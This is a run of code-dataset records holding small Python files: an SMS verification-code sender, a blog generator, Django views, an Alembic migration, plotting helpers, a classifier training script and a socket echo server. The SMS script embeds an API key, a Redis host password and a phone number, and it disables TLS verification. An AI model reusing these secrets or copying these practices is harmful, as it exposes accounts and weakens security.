"call"}, {"api_name": "byteplay.Code.from_code", "line_number": 288, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 288, "usage_type": "name"}, {"api_name": "code_tracing.inject_inversion", "line_number": 291, "usage_type": "call"}, {"api_name": "byteplay.Code.from_code", "line_number": 320, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 320, "usage_type": "name"}, {"api_name": "code_tracing.inject_tracing", "line_number": 326, "usage_type": "call"}, {"api_name": "code_tracing.inject_inversion", "line_number": 330, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 415, "usage_type": "call"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 457, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 458, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 459, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 460, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 461, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 466, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 467, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 468, "usage_type": "name"}, {"api_name": "byteplay.STORE_SUBSCR", "line_number": 469, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 477, "usage_type": "name"}, {"api_name": "byteplay.RETURN_VALUE", "line_number": 478, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 510, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 511, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 512, "usage_type": "name"}, {"api_name": "byteplay.BINARY_SUBSCR", "line_number": 513, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 514, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 515, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 516, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 517, "usage_type": "name"}, {"api_name": "byteplay.DUP_TOP", "line_number": 518, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 519, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 520, "usage_type": "name"}, {"api_name": "byteplay.ROT_TWO", "line_number": 521, "usage_type": "name"}, {"api_name": "byteplay.STORE_ATTR", "line_number": 522, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 523, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 524, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 525, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 529, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 530, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 531, "usage_type": "name"}, {"api_name": "byteplay.BINARY_SUBSCR", "line_number": 532, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 533, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 534, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 535, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 536, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 537, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 538, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 539, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 554, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 555, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 556, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 557, "usage_type": "name"}, {"api_name": "byteplay.STORE_FAST", "line_number": 558, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 563, "usage_type": "name"}, {"api_name": "byteplay.LOAD_FAST", "line_number": 564, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 565, "usage_type": "name"}, {"api_name": "byteplay.STORE_SUBSCR", "line_number": 566, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 602, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 609, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 609, "usage_type": "name"}, {"api_name": "byteplay.Code.from_code", "line_number": 618, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 618, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 622, "usage_type": "name"}, {"api_name": "byteplay.RETURN_VALUE", "line_number": 623, "usage_type": "name"}, {"api_name": "byteplay.Code", "line_number": 627, "usage_type": "call"}, {"api_name": "byteplay.Code.from_code", "line_number": 662, "usage_type": "call"}, {"api_name": "byteplay.Code", "line_number": 662, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 680, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 681, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 682, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 683, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 684, "usage_type": "name"}, {"api_name": "byteplay.MAKE_FUNCTION", "line_number": 685, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 686, "usage_type": "name"}, {"api_name": "byteplay.STORE_NAME", "line_number": 687, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 693, "usage_type": "name"}, {"api_name": "byteplay.LOAD_ATTR", "line_number": 694, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 706, "usage_type": "name"}, {"api_name": "byteplay.SetLineno", "line_number": 717, "usage_type": "name"}, {"api_name": "byteplay.DUP_TOP", "line_number": 718, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 719, "usage_type": "name"}, {"api_name": "byteplay.LOAD_NAME", "line_number": 720, "usage_type": "name"}, {"api_name": "byteplay.LOAD_CONST", "line_number": 721, "usage_type": "name"}, {"api_name": "byteplay.CALL_FUNCTION", "line_number": 722, "usage_type": "name"}, {"api_name": "byteplay.POP_TOP", "line_number": 723, "usage_type": "name"}]} +{"seq_id": "306316870", "text": "import json\nimport random\nimport re\n\nimport redis\nimport requests\n\nTEL_PATTERN = re.compile(r'1[3-9]\\d{9}')\n\n\ndef send_messag(tel, code):\n resp = requests.post(\n url='http://sms-api.luosimao.com/v1/send.json',\n auth=('api', 'key-8aa189224438080c6c41286ea3df5aaf'),\n data={\n 'mobile': tel,\n 'message': f'您的短信验证码是{code},打死也不能告诉别人哦!【Python小课】'\n },\n timeout=3,\n verify=False\n )\n return json.loads(resp.text)\n\n\ndef main():\n tel = input('请输入手机号: ')\n if TEL_PATTERN.fullmatch(tel):\n client = redis.Redis(host='120.77.222.217',\n port=6379,\n password='1qaz2wsx')\n if client.exists(tel):\n print('请不要在120秒内重复发送短信验证码!!!')\n else:\n code = ''.join(random.choices('0123456789', k=6))\n result = send_messag(tel, code)\n print(result['error'])\n if result['error'] == 0:\n client.set(tel, code, ex=120)\n print('发送成功!!!')\n else:\n print('请输入有效的手机号码!!!')\n code = ''.join(random.choices('0123456789', k=6))\n send_messag('13114109737', code)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "数据库文档/code/example08.py", "file_name": "example08.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 12, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "redis.Redis", "line_number": 28, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 34, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "98303603", "text": "import pickle\nimport os\nimport json\nimport jinja2\n\ndef get_template():\n with open(\"template.html\") as handle:\n template = handle.read()\n return template\n\ndef get_cur_folder():\n return os.path.split(\n os.path.realpath(__file__)\n )[0]\n\ndef read_json():\n with open(get_cur_folder()+\"/config/config.json\",'r+') as handle:\n config = json.load(handle)\n return config\n\ndef write_html(doc):\n with open(get_cur_folder()+\"/assets/index.html\",\"w+\") as handle:\n handle.write(doc)\n return True\n\ndef make_html():\n config = read_json()\n doc = jinja2.Template(get_template()).render(\n title=config['meta']['title'],\n footer=config['meta']['footer'],\n about=config['meta']['about']\n )\n return write_html(doc)\n\nmake_html()\n", "sub_path": "init_blog.py", "file_name": "init_blog.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.split", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "572730184", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import View, ListView\nfrom sellers.models import Seller\nfrom products.models import Product\n\n\nclass DashboardView(View):\n def get(self, request, *args, **kwargs):\n sellers = Seller.objects.order_by('presentation_name')[:5]\n products = Product.objects.order_by('name')[:5]\n return render(request, \"common/dashboard.html\",\n {\"sellers\": sellers,\n \"products\": products})\n\n\ndef success_view(request):\n return HttpResponse(\"success\")\n\n\nclass FilteredListView(ListView):\n def get_filter_queryset(self, queryset, q):\n raise NotImplementedError\n\n def get_queryset(self):\n self.q = self.request.GET.get('q')\n if self.q:\n return self.get_filter_queryset(super().get_queryset(), self.q)\n return super().get_queryset()\n\n def get_context_data(self, **kwargs):\n if self.q:\n kwargs['q'] = self.q\n return super().get_context_data(**kwargs)\n", "sub_path": "apps/common/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.views.generic.View", "line_number": 8, "usage_type": "name"}, {"api_name": "sellers.models", "line_number": 10, "usage_type": "name"}, {"api_name": "sellers.models.Seller.objects.order_by", "line_number": 10, "usage_type": "call"}, {"api_name": "sellers.models.Seller.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sellers.models.Seller", "line_number": 10, "usage_type": "name"}, {"api_name": "products.models", "line_number": 11, "usage_type": "name"}, {"api_name": "products.models.Product.objects.order_by", "line_number": 11, "usage_type": "call"}, {"api_name": "products.models.Product.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "products.models.Product", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "sellers.models", "line_number": 13, "usage_type": "name"}, {"api_name": "products.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "599363055", "text": "\"\"\"empty message\n\nRevision ID: 92b82850b5c3\nRevises: 2258727bf914\nCreate Date: 2020-05-14 17:54:02.111660\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '92b82850b5c3'\ndown_revision = '2258727bf914'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('catalog', sa.Column('end_point', sa.BOOLEAN(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('catalog', 'end_point')\n # ### end Alembic commands ###\n", "sub_path": "migrations/ozon/versions/92b82850b5c3_.py", "file_name": "92b82850b5c3_.py", "file_ext": "py", "file_size_in_byte": 660, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "569405270", "text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt;\n\n\ndef draw_network_inputs(images):\n plt.imshow(np.transpose(images.tensors[0].cpu().detach().numpy()/255 + 0.5, (1, 2, 0)))\n plt.show()\n\n plt.imshow(np.transpose(images.tensors[1].cpu().detach().numpy() / 255 + 0.5, (1, 2, 0)))\n plt.show()\n\n plt.imshow(np.transpose(images.tensors[2].cpu().detach().numpy() / 255 + 0.5, (1, 2, 0)))\n plt.show()\n\n\ndef plot_inference_for_image(predictor, image_path):\n image = cv2.imread(image_path)\n result = predictor.run_on_opencv_image(image)\n\n plt.imshow(result)\n plt.show()", "sub_path": "util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 603, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.pyplot.imshow", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.transpose", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "382212099", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom scipy.io import arff \nimport csv\nimport pickle\n\nfrom train import trainClassifiers, performSystematicExperiments, plotLosses\n\ndef plotAccuarcyForClassifiers(X,y):\n # save cross validation results to .csv\n cv_results = performSystematicExperiments(X, y)\n saveResultsTo_csv(cv_results, optimized=False)\n\n accuracies = [value for value in cv_results.values()]\n plt.figure(figsize=(15, 10))\n plt.title(\"Mean NSE for all sequence lengths\")\n plt.ylabel(\"Classification Accuracy\")\n plt.xlabel(\"Models\")\n plt.boxplot(accuracies, showmeans=True, notch=False)\n plt.xticks(range(1, len(cv_results.keys()) + 1), cv_results.keys(), rotation='horizontal')\n plt.show()\n\t\n \ndef pickleDictionaryTo(results_dict, path=None):\n if path is None:\n path = ''\n f = open(path+\"optimization_results.pkl\",\"wb\")\n pickle.dump(results_dict, f)\n f.close()\n \n\ndef saveResultsTo_csv(results_dict, optimized=True):\n \"\"\"Saves the result of optimization Or Cross validation to a .csv file\"\"\"\n fieldnames = []\n if optimized is True:\n filename = 'optimization_results.csv'\n fieldnames = ['Model', 'Accuracy', 'Best Params']\n else:\n filename = 'cross_validation_results.csv'\n fieldnames = ['model type', 'fold 1', 'fold 2', 'fold 3', 'fold 4', 'fold 5']\n csvfile = open(filename, 'w', newline='')\n writer = csv.DictWriter(csvfile, delimiter=',', fieldnames=fieldnames)\n writer.writeheader()\n if optimized is True:\n for key, value in zip(results_dict.keys(), results_dict.values()):\n print({'Model': key, 'Accuracy': value['accuracy'], 'Best Params': str(value['params'])})\n writer.writerow({'Model': key, 'Accuracy': value['accuracy'], 'Best Params': str(value['params'])})\n else:\n for key, value in zip(results_dict.keys(), results_dict.values()):\n row = {}\n row['model type'] = key\n for i in range(0, len(fieldnames)-1):\n row[fieldnames[i+1]] = value[i]\n writer.writerow(row)\n csvfile.close()\n\n \ndef getData(dataPath):\n \"\"\"Loads matrix of features X and vector of labels y given one .arff file\"\"\"\n\n fileName = \"{}/{}.music.arff\"\n dataset = None\n for i in range(6, 7):\n with open(fileName.format(dataPath,i), 'r') as f:\n # https://docs.scipy.org/doc/scipy/reference/generated/scipy.io.arff.loadarff.html\n ## Read arff\n data, meta = arff.loadarff(f)\n ## Convert to a dataframe\n print(fileName.format(dataPath,i))\n if dataset is None:\n dataset = pd.DataFrame(data)\n else:\n dataset = pd.concat([dataset, pd.DataFrame(data)], ignore_index=True)\n\n # Split into data and labels\n X = dataset.iloc[:, :-1].values\n y = np.array([1 if str(w, 'utf-8') == 'music' else 0 for w in dataset.iloc[:, -1]])\n return X, y\n\n\ndef main():\n dataPath = '../data/train_arff'\n print(\"Start Program\")\n X, y = getData(dataPath)\n# plotAccuarcyForClassifiers(X, y)\n opt_results = trainClassifiers(X[:6000], y[:6000])\n saveResultsTo_csv(opt_results, optimized=True)\n best_params = opt_results['params'] #'RandomForest'\n from sklearn.manifold import TSNE\n from sklearn.decomposition import TruncatedSVD\n from sklearn.model_selection import train_test_split\n X_train, X_test, y_train, y_test = train_test_split(X[:6000], y[:6000], test_size=0.33, random_state=0)\n reducer = TruncatedSVD(n_components=50, random_state=0)\n X_train_reduced = reducer.fit_transform(X_train)\n X_test_reduced = reducer.transform(X_test)\n # reduce a second time to 2 features, because embedding takes more time\n reducer = TruncatedSVD(n_components=2, random_state=0)\n X_train_again_reduced = reducer.fit_transform(X_train_reduced)\n X_test_again_reduced = reducer.transform(X_test_reduced)\n embedder = TSNE(n_components=2, perplexity=40, verbose=2)\n X_train_embedded = embedder.fit_transform(X_train_reduced)\n embedder = TSNE(n_components=2, perplexity=40, verbose=2)\n X_test_embedded = embedder.fit_transform(X_test_reduced)\n print(\"X_train reduced: \", X_train_reduced.shape)\n print(\"X_test reduced: \", X_test_reduced.shape)\n print(\"X_train embedded: \", X_train_embedded.shape)\n print(\"X_test embedded: \", X_test_embedded.shape)\n \n from sklearn.ensemble import RandomForestClassifier\n # TODO: parameter einstellen\n classifier = RandomForestClassifier(max_depth=10, max_features=2, n_estimators=100)\n classifier.fit(X_train[:, -3:-1], y_train)\n \n # Visualising the Training set results\n from matplotlib.colors import ListedColormap\n X_set, y_set = X_train[:, -3:-1], y_train\n X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),\n np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.50, cmap = ListedColormap(('red', 'green')))\n plt.scatter(X_set[y_set == 0, 0], X_set[y_set == 0, 1], c = 'red', label = 0)\n plt.scatter(X_set[y_set == 1, 0], X_set[y_set == 1, 1], c = 'green', label = 1)\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n# for i, j in enumerate(np.unique(y_set)):\n# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n# c = ListedColormap(('red', 'green'))(i), label = j)\n plt.title('Neural Networks (Training set)')\n plt.xlabel('Reduced f01')\n plt.ylabel('Reduced f02')\n plt.legend()\n plt.show()\n \n # Visualising the Test set results because data is smaller here\n from matplotlib.colors import ListedColormap\n X_set, y_set = X_test[:, -3:-1], y_test\n X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),\n np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.50, cmap = ListedColormap(('red', 'green')))\n plt.scatter(X_set[y_set == 0, 0], X_set[y_set == 0, 1], c = 'red', label = 0)\n plt.scatter(X_set[y_set == 1, 0], X_set[y_set == 1, 1], c = 'green', label = 1)\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n# for i, j in enumerate(np.unique(y_set)):\n# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n# c = ListedColormap(('red', 'green'))(i), label = j)\n plt.title('Neural Networks (Test set)')\n plt.xlabel('Reduced f01')\n plt.ylabel('Reduced f02')\n plt.legend()\n plt.show()\n \n# train_erros, val_errors, test_errors = plotLosses(opt_results, X, y)\n classifier = MLPClassifier(hidden_layer_sizes=(16, 16), activation='tanh',\n solver='adam', alpha=9.263406719097344e-05, learning_rate_init=0.0008804217040183917,\n random_state=0)\n classifier.fit(X_train[:,-3:-1], y_train)\n# 'hidden_layer_sizes': 16, 'alpha': 9.263406719097344e-05, 'learning_rate_init': 0.0008804217040183917, 'activation': 'tanh',\n# 'solver': 'adam', 'n_layers': 2}\n\nif __name__ == '__main__':\n main()", "sub_path": "Code/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "train.performSystematicExperiments", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.boxplot", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 30, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.io.arff.loadarff", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.io.arff", "line_number": 69, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "train.trainClassifiers", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "296256992", "text": "import socket\nfrom multiprocessing import Process\n\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\ndef task(conn):\n while True:\n data = conn.recv(1024)\n conn.send(data.upper())\n\ndef set_server():\n server.bind(('127.0.0.1',8080))\n server.listen(5)\n while True:\n conn,caddr = server.accept()\n\n p = Process(target = task,args = (conn,))\n p.start()\n\nif __name__ == '__main__':\n set_server()\n\n", "sub_path": "m4/socket_correlation/Process_Test/socket/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 508, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 4, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 4, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 4, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 5, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 5, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "617022849", "text": "# File containing classes controlling API calls in weather.py\n\nimport requests\nimport requests_mock\nimport json\n\nclass CurrentCondition: # Current conditions at that location\n\n def current_condition(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/conditions/q/\"+ zipcode +\".json\n 